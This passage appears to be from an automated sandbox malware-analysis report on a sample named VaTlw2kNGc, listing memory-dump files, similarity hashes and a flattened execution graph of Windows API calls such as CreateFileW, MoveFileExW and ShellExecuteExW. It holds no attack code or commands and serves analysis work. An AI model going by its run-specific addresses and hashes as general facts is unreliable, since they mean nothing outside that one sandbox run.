                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DriveType_invalid_parameter_noinfo
                                                                                                    • String ID: :
                                                                                                    • API String ID: 2595371189-336475711
                                                                                                    • Opcode ID: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                                                    • Instruction ID: fb77c04894fd7e2f1205b4b6178695d2e6e481c56ab2a1d07d4e951f78faeb66
                                                                                                    • Opcode Fuzzy Hash: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                                                    • Instruction Fuzzy Hash: CB01DB26A0C246C6FB2CBF60B46137EA3B0EF48708FE40036D55D82799DE3CE504CA20
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FFE133065B9,?,?,?,?,00007FFE1330FB22,?,?,?,?,?), ref: 00007FFE1330674B
                                                                                                    • SetLastError.KERNEL32(?,?,?,00007FFE133065B9,?,?,?,?,00007FFE1330FB22,?,?,?,?,?), ref: 00007FFE133067D4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 1452528299-0
                                                                                                    • Opcode ID: c7aaac8a80d8b30c274ca3e3b7c59e83a4e0092024cc1b5b0b7c72c8c7be0031
                                                                                                    • Instruction ID: 8f3a0269e4e7ca263cb3aff369a8733bfe70b3844679d4ccb9cd7ba3d7f51711
                                                                                                    • Opcode Fuzzy Hash: c7aaac8a80d8b30c274ca3e3b7c59e83a4e0092024cc1b5b0b7c72c8c7be0031
                                                                                                    • Instruction Fuzzy Hash: 21112424F0DE528AFA54972398041792291EF68BF0F2446B4D97E277FADF3CA441E608

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:10.2%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:3.7%
                                                                                                    Total number of Nodes:1750
                                                                                                    Total number of Limit Nodes:37
                                                                                                    execution_graph 26570 921890 86 API calls Concurrency::cancel_current_task 26645 94e680 GetProcessHeap 24668 94bab0 24676 94d3ff 24668->24676 24672 94bacc 24673 94bad9 24672->24673 24684 94bae0 11 API calls 24672->24684 24675 94bac4 24677 94d2e8 _abort 5 API calls 24676->24677 24678 94d426 24677->24678 24679 94d43e TlsAlloc 24678->24679 24680 94d42f 24678->24680 24679->24680 24681 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24680->24681 24682 94baba 24681->24682 24682->24675 24683 94ba29 20 API calls 2 library calls 24682->24683 24683->24672 24684->24675 24686 9210b5 24691 92668f 24686->24691 24688 9210ba 24699 941932 29 API calls 24688->24699 24690 9210c4 24692 92669b __EH_prolog3 24691->24692 24700 92d467 24692->24700 24694 9266a5 24703 9311a5 24694->24703 24696 9266fc 24707 9268b3 GetCurrentProcess GetProcessAffinityMask 24696->24707 24698 926719 24698->24688 24699->24690 24708 92d4bd 24700->24708 24704 9311b1 __EH_prolog3 24703->24704 24717 924a2c 41 API calls 24704->24717 24706 9311ca 24706->24696 24707->24698 24709 92d4cf _abort 24708->24709 24712 9331c2 24709->24712 24715 933184 GetCurrentProcess GetProcessAffinityMask 24712->24715 24716 92d4b9 24715->24716 24716->24694 24717->24706 26577 9400b3 DialogBoxParamW 26648 94aaba 55 API calls _free 26578 93b4a0 ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 24735 94e6a1 31 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24762 9410a8 24763 9410b2 24762->24763 24764 940d3a ___delayLoadHelper2@8 14 API calls 24763->24764 24765 9410bf 24764->24765 26650 9382d0 137 API calls __InternalCxxFrameHandler 25422 93f6de 25436 93ea83 _wcslen _wcsrchr 25422->25436 25424 93f717 25425 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25424->25425 25426 93f732 25425->25426 25427 93ed57 SetWindowTextW 25427->25436 25429 92dd18 5 API calls 25429->25436 25433 93eb4b SetFileAttributesW 25434 93ec05 GetFileAttributesW 25433->25434 25450 93eb65 _abort _wcslen 25433->25450 25434->25436 25438 93ec17 DeleteFileW 25434->25438 25436->25424 25436->25427 25436->25429 25436->25433 25442 93f73c 25436->25442 25447 93ef75 SendMessageW 25436->25447 25451 93d41c 25436->25451 25470 93d5dd 25436->25470 25476 93c5dd GetCurrentDirectoryW 25436->25476 25478 92c3de 11 API calls 25436->25478 25479 92c367 FindClose 25436->25479 25480 93d76e 76 API calls 3 library calls 25436->25480 25481 9466ae 25436->25481 25438->25436 25440 93ec28 25438->25440 25445 924c00 _swprintf 51 API calls 25440->25445 25441 93ef35 GetDlgItem SetWindowTextW SendMessageW 25441->25436 25494 9413f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 25442->25494 25444 93f741 25446 93ec48 GetFileAttributesW 25445->25446 25446->25440 25448 93ec5d MoveFileW 25446->25448 25447->25436 25448->25436 25449 93ec75 MoveFileExW 25448->25449 25449->25436 25450->25434 25450->25436 25477 92d8ac 51 API calls 2 library calls 25450->25477 25454 93d42e 25451->25454 25452 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25453 93d4f6 25452->25453 25453->25441 25455 93d4ba 25454->25455 25456 93d500 25454->25456 25455->25452 25495 9413f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 25456->25495 25458 93d505 25496 921366 25458->25496 25461 93d574 25464 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25461->25464 25462 93d562 25462->25461 25466 93d583 GetDlgItemTextW 25462->25466 25469 93d56f 25462->25469 25463 93d5b5 SetDlgItemTextW 25463->25461 25465 93d5d4 25464->25465 25465->25441 25467 931421 82 API calls 25466->25467 25467->25469 25468 93d57a EndDialog 25468->25461 25469->25461 25469->25468 25473 93d5e7 25470->25473 25471 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25472 93d6fc 25471->25472 25472->25436 25474 93d6bc ExpandEnvironmentStringsW 25473->25474 25475 93d6df 25473->25475 25474->25475 25475->25471 25476->25436 25477->25450 25478->25436 25479->25436 25480->25436 25482 94bb34 25481->25482 25483 94bb41 25482->25483 25484 94bb4c 25482->25484 25485 94bc8e __vswprintf_c_l 21 API calls 25483->25485 25486 94bb54 25484->25486 25492 94bb5d _abort 25484->25492 25491 94bb49 25485->25491 25487 94bafa _free 20 API calls 25486->25487 25487->25491 25488 94bb87 HeapReAlloc 25488->25491 25488->25492 25489 94bb62 25508 94bc7b 20 API calls __dosmaperr 25489->25508 25491->25436 25492->25488 25492->25489 25509 94a2ec 7 API calls 2 library calls 25492->25509 25494->25444 25495->25458 25497 9213c8 25496->25497 25498 92136f 25496->25498 25507 93021d GetWindowLongW SetWindowLongW 25497->25507 25499 9213d5 25498->25499 25506 930244 62 API calls 3 library calls 25498->25506 25499->25461 25499->25462 25499->25463 25502 921391 25502->25499 25503 9213a4 GetDlgItem 25502->25503 25503->25499 25504 9213b4 25503->25504 25504->25499 25505 9213ba SetWindowTextW 25504->25505 25505->25499 25506->25502 25507->25499 25508->25491 25509->25492 26584 93d8c0 98 API calls 25599 9408f6 25600 94089f 25599->25600 25601 940d3a ___delayLoadHelper2@8 14 API calls 25600->25601 25601->25600 26653 94caf0 71 API calls _free 26654 952ef0 IsProcessorFeaturePresent 26585 941cf3 20 API calls 26586 9224e0 26 API calls std::bad_exception::bad_exception 25610 93dae0 25611 93daf2 25610->25611 25612 921366 66 API calls 25611->25612 25613 93db45 25612->25613 25614 93db76 25613->25614 25615 93e250 25613->25615 25616 93db5c 25613->25616 25618 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25614->25618 25865 93f9ee 25615->25865 25616->25614 25621 93dbd0 25616->25621 25622 93db6d 25616->25622 25620 93e555 25618->25620 25627 93dc63 GetDlgItemTextW 25621->25627 25631 93dbe6 25621->25631 25623 93db71 25622->25623 25624 93dbad 25622->25624 25623->25614 25632 930597 53 API calls 25623->25632 25624->25614 25633 93dc94 KiUserCallbackDispatcher 25624->25633 25625 93e26b SendMessageW 25626 93e279 25625->25626 25629 93e293 GetDlgItem SendMessageW 25626->25629 25630 93e282 SendDlgItemMessageW 25626->25630 25627->25624 25628 93dca0 25627->25628 25635 93dcb5 GetDlgItem 25628->25635 25783 93dca9 25628->25783 25884 93c5dd GetCurrentDirectoryW 25629->25884 25630->25629 25636 930597 53 API calls 25631->25636 25637 93db90 25632->25637 25633->25614 25639 93dcc9 SendMessageW SendMessageW 25635->25639 25640 93dcec SetFocus 25635->25640 25641 93dc03 SetDlgItemTextW 25636->25641 25908 921273 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25637->25908 25638 93e2c3 GetDlgItem 25645 93e2e0 25638->25645 25646 93e2e6 SetWindowTextW 25638->25646 25639->25640 25642 93dcfc 25640->25642 25657 93dd08 25640->25657 25643 93dc0e 25641->25643 25647 930597 53 API calls 25642->25647 25643->25614 25652 93dc1b GetMessageW 25643->25652 25645->25646 25885 93cb49 GetClassNameW 25646->25885 25653 93dd06 25647->25653 25648 93db97 25648->25614 25658 93e531 SetDlgItemTextW 25648->25658 25649 93e196 25654 930597 53 API calls 25649->25654 25652->25614 25656 93dc32 IsDialogMessageW 25652->25656 25785 93f7fc 25653->25785 25659 93e1a6 SetDlgItemTextW 25654->25659 25656->25643 25662 93dc41 TranslateMessage DispatchMessageW 25656->25662 25664 930597 53 API calls 25657->25664 25658->25614 25660 93e1ba 25659->25660 25666 930597 53 API calls 25660->25666 25662->25643 25668 93dd3f 25664->25668 25698 93e1dd _wcslen 25666->25698 25667 93e331 25673 93e361 25667->25673 25677 930597 53 API calls 25667->25677 25674 924c00 _swprintf 51 API calls 25668->25674 25669 93dd77 25671 93dd96 25669->25671 25675 92bccb 8 API calls 25669->25675 25797 92baf1 25671->25797 25672 93ea07 121 API calls 25672->25667 25678 93e419 25673->25678 25683 93ea07 121 API calls 25673->25683 25674->25653 25680 93dd8c 25675->25680 25682 93e344 SetDlgItemTextW 25677->25682 25679 93e4c0 25678->25679 25715 93e4a1 25678->25715 25732 930597 53 API calls 25678->25732 25686 93e4d2 25679->25686 25687 93e4c9 EnableWindow 25679->25687 25680->25671 25685 93dd90 25680->25685 25690 930597 53 API calls 25682->25690 25684 93e37c 25683->25684 25695 93e38e 25684->25695 25724 93e3b3 25684->25724 25910 93cebf 9 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25685->25910 25699 93e4ef 25686->25699 25918 921323 GetDlgItem EnableWindow 25686->25918 25687->25686 25688 93ddba 25808 93cbb6 SetCurrentDirectoryW 25688->25808 25689 93ddaf GetLastError 25689->25688 25693 93e358 SetDlgItemTextW 25690->25693 25691 930597 53 API calls 25691->25614 25693->25673 25916 93be55 31 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25695->25916 25696 93e40c 25704 93ea07 121 API calls 25696->25704 25711 930597 53 API calls 25698->25711 25733 93e22e 25698->25733 25700 93e516 25699->25700 25712 93e50e SendMessageW 25699->25712 25700->25614 25709 930597 53 API calls 25700->25709 25701 93ddce 25702 93ddd7 GetLastError 25701->25702 25703 93dde5 25701->25703 25702->25703 25707 93de5c 25703->25707 25714 93de6b 25703->25714 25716 93ddf5 GetTickCount 25703->25716 25704->25678 25706 93e4e5 25919 921323 GetDlgItem EnableWindow 25706->25919 25713 93e097 25707->25713 25707->25714 25708 93e3a7 25708->25724 25709->25648 25717 93e211 25711->25717 25712->25700 25819 921341 GetDlgItem ShowWindow 25713->25819 25719 93e03c 25714->25719 25721 93e032 25714->25721 25722 93de84 GetModuleFileNameW 25714->25722 25917 93be55 31 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25715->25917 25723 924c00 _swprintf 51 API calls 25716->25723 25725 924c00 _swprintf 51 API calls 25717->25725 25728 930597 53 API calls 25719->25728 25721->25624 25721->25719 25911 9312bc 82 API calls 25722->25911 25731 93de12 25723->25731 25724->25696 25729 93ea07 121 API calls 25724->25729 25725->25733 25726 93e4bd 25726->25679 25736 93e046 25728->25736 25737 93e3e1 25729->25737 25730 93e0a7 25820 921341 GetDlgItem ShowWindow 25730->25820 25809 92b01e 25731->25809 25732->25678 25733->25691 25735 93deac 25738 924c00 _swprintf 51 API calls 25735->25738 25739 924c00 _swprintf 51 API calls 25736->25739 25737->25696 25740 93e3ea DialogBoxParamW 25737->25740 25743 93dece CreateFileMappingW 25738->25743 25745 93e064 25739->25745 25740->25624 25740->25696 25741 93e0b1 25742 930597 53 API calls 25741->25742 25747 93e0bb SetDlgItemTextW 25742->25747 25746 93df2c GetCommandLineW 25743->25746 25779 93dfa3 __InternalCxxFrameHandler 25743->25779 25755 930597 53 API calls 25745->25755 25751 93df3d 25746->25751 25821 921341 GetDlgItem ShowWindow 25747->25821 25749 93dfae ShellExecuteExW 25776 93dfc9 25749->25776 25912 93d705 SHGetMalloc 25751->25912 25752 93de3f GetLastError 25753 93de4a 25752->25753 25757 92af2f 80 API calls 25753->25757 25761 93e07e 25755->25761 25756 93e0cd SetDlgItemTextW GetDlgItem 25758 93e102 25756->25758 25759 93e0ea GetWindowLongW SetWindowLongW 25756->25759 25757->25707 25822 93ea07 25758->25822 25759->25758 25760 93df59 25913 93d705 SHGetMalloc 25760->25913 25765 93df65 25914 93d705 SHGetMalloc 25765->25914 25767 93e00c 25767->25721 25772 93e022 UnmapViewOfFile CloseHandle 25767->25772 25768 93ea07 121 API calls 25770 93e11e 25768->25770 25769 93df71 25773 93136b 82 API calls 25769->25773 25853 93fdf7 25770->25853 25772->25721 25775 93df82 MapViewOfFile 25773->25775 25775->25779 25776->25767 25777 93dff8 Sleep 25776->25777 25777->25767 25777->25776 25779->25749 25783->25624 25783->25649 25786 93d864 5 API calls 25785->25786 25787 93f817 GetDlgItem 25786->25787 25788 93f836 25787->25788 25789 93f86e SendMessageW SendMessageW 25787->25789 25792 93f841 ShowWindow SendMessageW SendMessageW 25788->25792 25790 93f8ae 25789->25790 25791 93f8cd SendMessageW SendMessageW SendMessageW 25789->25791 25790->25791 25793 93f901 SendMessageW 25791->25793 25794 93f924 SendMessageW 25791->25794 25792->25789 25793->25794 25795 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25794->25795 25796 93dd62 25795->25796 25796->25669 25909 93ff24 5 API calls 2 library calls 25796->25909 25801 92bafb 25797->25801 25798 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25799 92bbf0 25798->25799 25799->25688 25799->25689 25800 92bba8 25802 92bee1 13 API calls 25800->25802 25803 92bbd0 25800->25803 25801->25800 25801->25803 25804 92bbf9 25801->25804 25920 92bee1 25801->25920 25802->25803 25803->25798 25935 9413f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 25804->25935 25807 92bbfe 25808->25701 25810 92b028 25809->25810 25811 92b096 CreateFileW 25810->25811 25812 92b08d 25810->25812 25811->25812 25813 92b0dd 25812->25813 25814 92da1e 6 API calls 25812->25814 25817 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25813->25817 25815 92b0c2 25814->25815 25815->25813 25816 92b0c6 CreateFileW 25815->25816 25816->25813 25818 92b111 25817->25818 25818->25752 25818->25753 25819->25730 25820->25741 25821->25756 25823 93ea19 25822->25823 25824 93f717 25823->25824 25825 93d5dd 6 API calls 25823->25825 25826 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25824->25826 25838 93ea7c _wcslen _wcsrchr 25825->25838 25827 93e110 25826->25827 25827->25768 25828 93d5dd 6 API calls 25828->25838 25829 93ed57 SetWindowTextW 25829->25838 25831 92dd18 5 API calls 25831->25838 25833 9466ae 22 API calls 25833->25838 25835 93eb4b SetFileAttributesW 25836 93ec05 GetFileAttributesW 25835->25836 25852 93eb65 _abort _wcslen 25835->25852 25836->25838 25840 93ec17 DeleteFileW 25836->25840 25838->25824 25838->25828 25838->25829 25838->25831 25838->25833 25838->25835 25841 93d41c 100 API calls 25838->25841 25844 93f73c 25838->25844 25849 93ef75 SendMessageW 25838->25849 25946 93c5dd GetCurrentDirectoryW 25838->25946 25948 92c3de 11 API calls 25838->25948 25949 92c367 FindClose 25838->25949 25950 93d76e 76 API calls 3 library calls 25838->25950 25840->25838 25842 93ec28 25840->25842 25843 93ef35 GetDlgItem SetWindowTextW SendMessageW 25841->25843 25847 924c00 _swprintf 51 API calls 25842->25847 25843->25838 25951 9413f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 25844->25951 25846 93f741 25848 93ec48 GetFileAttributesW 25847->25848 25848->25842 25850 93ec5d MoveFileW 25848->25850 25849->25838 25850->25838 25851 93ec75 MoveFileExW 25850->25851 25851->25838 25852->25836 25852->25838 25947 92d8ac 51 API calls 2 library calls 25852->25947 25854 93fe13 25853->25854 25952 9326df 25854->25952 25856 93fe59 25956 928ddf 25856->25956 25858 93feb7 25966 928ff5 25858->25966 25866 93f9f8 25865->25866 25867 93c556 4 API calls 25866->25867 25868 93fa13 25867->25868 25869 93fae1 25868->25869 25870 93fa1b GetWindow 25868->25870 25871 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25869->25871 25870->25869 25874 93fa34 25870->25874 25872 93e256 25871->25872 25872->25625 25872->25626 25873 93fa41 GetClassNameW 25873->25874 25874->25869 25874->25873 25875 93fa65 GetWindowLongW 25874->25875 25876 93fac9 GetWindow 25874->25876 25875->25876 25877 93fa75 SendMessageW 25875->25877 25876->25869 25876->25874 25877->25876 25878 93fa8b GetObjectW 25877->25878 26481 93c595 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25878->26481 25881 93faa2 26482 93c574 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25881->26482 26483 93c79c 13 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25881->26483 25883 93fab3 SendMessageW DeleteObject 25883->25876 25884->25638 25886 93cb74 25885->25886 25887 93cb99 25885->25887 25886->25887 25892 93cb8b FindWindowExW 25886->25892 25888 93cba7 25887->25888 25889 93cb9e SHAutoComplete 25887->25889 25890 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25888->25890 25889->25888 25891 93cbb2 25890->25891 25893 93d243 25891->25893 25892->25887 25894 93d255 25893->25894 25895 92147c 43 API calls 25894->25895 25896 93d2af 25895->25896 26484 9220eb 25896->26484 25899 93d2d1 26491 921b0e 25899->26491 25900 93d2c5 25901 9216b8 86 API calls 25900->25901 25906 93d2cd 25901->25906 25903 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25904 93d357 25903->25904 25904->25667 25904->25672 25905 9216b8 86 API calls 25905->25906 25906->25903 25907 93d2ed __InternalCxxFrameHandler ___std_exception_copy 25907->25905 25908->25648 25909->25669 25910->25671 25911->25735 25912->25760 25913->25765 25914->25769 25916->25708 25917->25726 25918->25706 25919->25699 25921 92beee 25920->25921 25922 92bf1c 25921->25922 25923 92bf0f CreateDirectoryW 25921->25923 25924 92bccb 8 API calls 25922->25924 25923->25922 25926 92bf4f 25923->25926 25925 92bf22 25924->25925 25927 92bf62 GetLastError 25925->25927 25929 92da1e 6 API calls 25925->25929 25928 92bf5e 25926->25928 25936 92c2e5 25926->25936 25927->25928 25932 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25928->25932 25931 92bf38 25929->25931 25931->25927 25933 92bf3c CreateDirectoryW 25931->25933 25934 92bf85 25932->25934 25933->25926 25933->25927 25934->25801 25935->25807 25937 941590 25936->25937 25938 92c2f2 SetFileAttributesW 25937->25938 25939 92c314 25938->25939 25940 92c33f 25938->25940 25941 92da1e 6 API calls 25939->25941 25942 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25940->25942 25943 92c326 25941->25943 25944 92c34d 25942->25944 25943->25940 25945 92c32a SetFileAttributesW 25943->25945 25944->25928 25945->25940 25946->25838 25947->25852 25948->25838 25949->25838 25950->25838 25951->25846 25953 9326ec _wcslen 25952->25953 25985 921925 25953->25985 25955 932704 25955->25856 25957 928deb __EH_prolog3 25956->25957 25998 92ee0f 25957->25998 25959 928e0e 25960 94121c 27 API calls 25959->25960 25961 928e52 _abort 25960->25961 25962 94121c 27 API calls 25961->25962 25963 928e7a 25962->25963 26004 936b0d 25963->26004 25965 928eac 25965->25858 25967 928fff 25966->25967 25968 929080 25967->25968 26034 92c37a 25967->26034 25973 9290e5 25968->25973 26011 9296b9 25968->26011 25970 929127 25972 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25970->25972 25974 92914e 25972->25974 25973->25970 26040 921407 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25973->26040 25976 928ebb 25974->25976 26472 92ab26 8 API calls _abort 25976->26472 25978 928ee6 25980 928ef7 Concurrency::cancel_current_task 25978->25980 26473 934396 25978->26473 25981 922179 26 API calls 25980->25981 25982 928f1e 25981->25982 26479 92eea4 86 API calls Concurrency::cancel_current_task 25982->26479 25986 921937 25985->25986 25993 92198f 25985->25993 25987 921960 25986->25987 25995 927bad 76 API calls 2 library calls 25986->25995 25989 9466ae 22 API calls 25987->25989 25991 921980 25989->25991 25990 921956 25996 927c32 75 API calls 25990->25996 25991->25993 25997 927c32 75 API calls 25991->25997 25993->25955 25995->25990 25996->25987 25997->25993 25999 92ee1b __EH_prolog3 25998->25999 26000 94121c 27 API calls 25999->26000 26002 92ee59 26000->26002 26001 94121c 27 API calls 26003 92ee7d 26001->26003 26002->26001 26003->25959 26005 936b19 __EH_prolog3 26004->26005 26006 94121c 27 API calls 26005->26006 26007 936b33 26006->26007 26008 936b4a 26007->26008 26010 932f22 80 API calls 26007->26010 26008->25965 26010->26008 26012 9296d4 26011->26012 26041 92147c 26012->26041 26014 9296fb 26015 92970c 26014->26015 26204 92b982 26014->26204 26019 929743 26015->26019 26051 921b63 26015->26051 26018 92973f 26018->26019 26070 9220a1 142 API calls __EH_prolog3 26018->26070 26196 9216b8 26019->26196 26025 9297e4 26071 92988e 81 API calls 26025->26071 26027 92976b 26027->26025 26033 92c37a 12 API calls 26027->26033 26028 929842 26028->26019 26075 92441e 26028->26075 26087 929906 26028->26087 26029 9297fe 26029->26028 26072 933cf2 26029->26072 26033->26027 26035 92c38f 26034->26035 26039 92c3bd 26035->26039 26459 92c4a8 26035->26459 26038 92c3a4 FindClose 26038->26039 26039->25967 26040->25970 26042 921488 __EH_prolog3 26041->26042 26043 92ee0f 27 API calls 26042->26043 26044 9214b7 26043->26044 26045 94121c 27 API calls 26044->26045 26048 92152b 26044->26048 26046 921518 26045->26046 26046->26048 26049 92668f 43 API calls 26046->26049 26208 92cc45 26048->26208 26049->26048 26050 9215b3 _abort 26050->26014 26052 921b6f __EH_prolog3 26051->26052 26053 921cef 26052->26053 26065 921bbc 26052->26065 26228 92145d 26052->26228 26053->26018 26056 921d21 26231 921407 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26056->26231 26058 92441e 116 API calls 26064 921d6c 26058->26064 26059 921d2e 26059->26053 26059->26058 26060 921db4 26060->26053 26063 921de7 26060->26063 26232 921407 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26060->26232 26062 92441e 116 API calls 26062->26064 26063->26053 26069 92b8c0 79 API calls 26063->26069 26064->26060 26064->26062 26065->26053 26065->26056 26065->26059 26066 92441e 116 API calls 26067 921e38 26066->26067 26067->26053 26067->26066 26068 92b8c0 79 API calls 26068->26065 26069->26067 26070->26027 26071->26029 26246 94029f 26072->26246 26076 92442a 26075->26076 26077 92442e 26075->26077 26076->26028 26086 92b8c0 79 API calls 26077->26086 26078 924440 26079 92445b 26078->26079 26080 924469 26078->26080 26085 92449b 26079->26085 26256 923ab7 104 API calls 3 library calls 26079->26256 26257 922fcb 116 API calls 3 library calls 26080->26257 26083 924467 26083->26085 26258 9225f4 74 API calls 26083->26258 26085->26028 26086->26078 26088 929918 26087->26088 26091 92997a 26088->26091 26110 929da2 Concurrency::cancel_current_task 26088->26110 26304 93ab94 117 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26088->26304 26090 92a820 26092 92a825 26090->26092 26093 92a86c 26090->26093 26091->26090 26098 92999b 26091->26098 26091->26110 26092->26110 26345 928c06 166 API calls 26092->26345 26093->26110 26346 93ab94 117 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26093->26346 26094 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26095 92a862 26094->26095 26095->26028 26098->26110 26259 926936 26098->26259 26100 929a71 26265 92d63a 26100->26265 26102 929bba 26106 929ce2 26102->26106 26102->26110 26307 929582 38 API calls 26102->26307 26104 929aa4 26104->26102 26305 92bf89 57 API calls 4 library calls 26104->26305 26111 92c37a 12 API calls 26106->26111 26115 929d40 26106->26115 26109 929c24 26306 949ea8 26 API calls 2 library calls 26109->26306 26110->26094 26111->26115 26113 92a0ac 26316 92f014 97 API calls 26113->26316 26269 928f84 26115->26269 26117 929dd1 26137 929e33 26117->26137 26308 924916 27 API calls 2 library calls 26117->26308 26121 92a0c3 26124 92a118 26121->26124 26140 92a0ce 26121->26140 26122 92a004 26122->26121 26126 92a033 26122->26126 26130 92a09b 26124->26130 26318 9293ac 119 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26124->26318 26125 92a116 26131 92af2f 80 API calls 26125->26131 26127 92a174 26126->26127 26126->26130 26132 92bccb 8 API calls 26126->26132 26128 92a1e2 26127->26128 26185 92a7d9 26127->26185 26319 92b288 26127->26319 26275 92c94d 26128->26275 26130->26125 26130->26127 26131->26110 26134 92a068 26132->26134 26133 92af2f 80 API calls 26133->26110 26134->26130 26315 92ac09 97 API calls 26134->26315 26136 929f71 26313 92240a 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26136->26313 26137->26110 26137->26136 26145 929f78 Concurrency::cancel_current_task 26137->26145 26309 928db7 41 API calls 26137->26309 26310 92f014 97 API calls 26137->26310 26311 92240a 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26137->26311 26312 92953f 98 API calls 26137->26312 26140->26125 26317 929155 123 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26140->26317 26143 92a231 26147 92c94d 27 API calls 26143->26147 26145->26122 26314 92bd61 50 API calls 3 library calls 26145->26314 26151 92a247 26147->26151 26149 92a1d0 26323 927e45 77 API calls 26149->26323 26152 92a31d 26151->26152 26164 92a2f4 26151->26164 26174 92b1e6 79 API calls 26151->26174 26153 92a511 26152->26153 26154 92a37c 26152->26154 26155 92a523 26153->26155 26156 92a537 26153->26156 26176 92a3b5 26153->26176 26158 92a394 26154->26158 26160 92a43c 26154->26160 26330 92ab81 26155->26330 26279 9353f0 26156->26279 26157 92a3db 26157->26176 26326 9288a9 112 API calls 26157->26326 26158->26157 26165 92a3a3 26158->26165 26163 92d63a 5 API calls 26160->26163 26162 92a550 26289 935099 26162->26289 26169 92a466 26163->26169 26164->26152 26324 92b427 82 API calls 26164->26324 26325 92240a 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26165->26325 26327 929582 38 API calls 26169->26327 26172 92a502 26172->26028 26174->26164 26175 92a47e 26175->26176 26177 92a494 26175->26177 26178 92a4ab 26175->26178 26176->26172 26181 92a5c5 26176->26181 26341 92c905 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26176->26341 26328 9285fc 86 API calls 26177->26328 26329 92a8b9 